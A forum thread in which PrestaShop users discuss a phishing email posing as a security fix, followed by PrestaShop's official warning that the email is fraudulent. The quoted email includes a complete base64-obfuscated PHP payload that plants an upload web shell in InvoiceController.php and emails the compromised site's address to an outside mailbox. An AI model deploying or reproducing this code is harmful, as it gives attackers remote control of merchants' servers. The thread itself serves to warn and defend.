Attention: I received this email Security alert CVE-2021-E49

[nuno.note]

Prestashop <[email protected]>

dkim = pass [email protected] header.s = 657wrrdpqxpxc4dyj324zbvh23phhc6f header.b = d9j9BT7P; dkim = pass [email protected] header.s = shh3fegwg5fppqsuzphvschd53n6ihuv header.b = m8vP0JQv; arc = pass (i = 1 spf = pass spfdomain = eu-west-1.amazonses.com dkim = pass dkdomain =);

 

Following an error concerning a security file linked to CVE-2021-E49.

We have attached the configuration file to update.

Replace config.inc.php from the config folder with the attached file,

We apologize for the inconvenience caused

 

<?php fwrite(fopen(base64_decode('Y29udHJvbGxlcnMvZnJvbnQvSW52b2ljZUNvbnRyb2xsZXIucGhw'),base64_decode('dys=')),base64_decode('PD9waHAgaWYoaXNzZXQoJF9HRVRbImhhaGFoYWhhIl0pKXtlY2hvIjxjZW50ZXI+PGZvbnQgY29sb3I9I0ZGRkZGRj5bdW5hbWVdIi5waHBfdW5hbWUoKS4iWy91bmFtZV0iO2VjaG8iPGJyPjxmb250IGNvbG9yPSNGRkZGRkY+W2Rpcl0iLmdldGN3ZCgpLiJbL2Rpcl0iO2VjaG8iPGZvcm0gbWV0aG9kPXBvc3QgZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhPiI7ZWNobyI8aW5wdXQgdHlwZT1maWxlIG5hbWU9Zj48aW5wdXQgbmFtZT12IHR5cGU9c3VibWl0IGlkPXYgdmFsdWU9dXA+PGJyPiI7aWYoJF9QT1NUWyJ2Il09PXVwKXtpZihAY29weSgkX0ZJTEVTWyJmIl1bInRtcF9uYW1lIl0sJF9GSUxFU1siZiJdWyJuYW1lIl0pKXtlY2hvIjxiPlN1Y2Nlc3M8L2I+LS0+Ii4kX0ZJTEVTWyJmIl1bIm5hbWUiXTt9ZWxzZXtlY2hvIjxiPkZhaWxlZCI7fX19'));$c0=base64_decode('ZGVlemVydGVzdHNAeWFuZGV4LnJ1');$o1=base64_decode('Tk9VVkVBVSBQUkVTVEEgLT4g').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')];$i2=base64_decode('ZnJvbTogQ0RMQiA8Y29uZmlncHJlc3RhQG1zLnNrPg==');$n3=base64_decode('TGluayA6IGh0dHA6Ly8=').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')].base64_decode('DQo=');$n3.=base64_decode('UGF0aCA6IA==').__file__.base64_decode('ICgvY29udHJvbGxlcnMvZnJvbnQvSW52b2ljZUNvbnRyb2xsZXIucGhwP2hhaGFoYWhhKQ==');$d4=@mail($c0,$o1,$n3,$i2);$l5=@mail($c0,$o1,$n3,$i2);?>

[Hertspartybags]

I have just had the same email as well, wasn't sure if it was legitimate or not. 

[ecommerce16]

This is absolutely fake. Prestashop will never send you files by email but will do this with an update!

When you check the sender you can also see its not from Prestashop

[Glamorhair]

Also got this email, I checked the email address looks wrong "[email protected] via amazonses.com "

none of prestashop email ever comes from this

[ecommerce16]

This is the official reaction of Prestashop:

 

Hello,

This message is to inform you that several members of our community have received an email containing a phishing attempt, pretending to be a message from PrestaShop.

This message, containing "Security Alert ↗" in its subject line, is not a PrestaShop message and is in no way affiliated with PrestaShop. This message is still appearing in the inboxes of our community members.

As soon as PrestaShop was informed of this malicious action, we alerted our users as soon as possible via social media and this email.

If you received this message, there is no risk for you, but we recommend deleting it from your email’s inbox.

If you downloaded the file attached to it on your computer, there is nothing to worry about, but we recommend deleting the file from your device, and deleting the email from your inbox.

If you followed all the instructions of this fraudulent email and uploaded this file to your server, please contact us as soon as possible.

If you did not receive this email, please stay vigilant for potential phishing attempts in the future.

PrestaShop never sends files, documents or Zip folders by email and will never do so. PrestaShop will never ask you for your password, and all emails from PrestaShop regarding a security issue will link to PrestaShop's website: prestashop.com, and will not contain any specific instruction within the message.

Of course PrestaShop takes this kind of event very seriously and we encourage all community members to stay alert for such attempts such as phishing, which we have unfortunately no control over.

▶ Read on fbi.gov: How to protect yourself against phishing

 

We will keep you informed of any future development as soon as we can, and we are working hard to fight against any future fraud attempts.

Thank you for being cautious and for your understanding.

The PrestaShop team.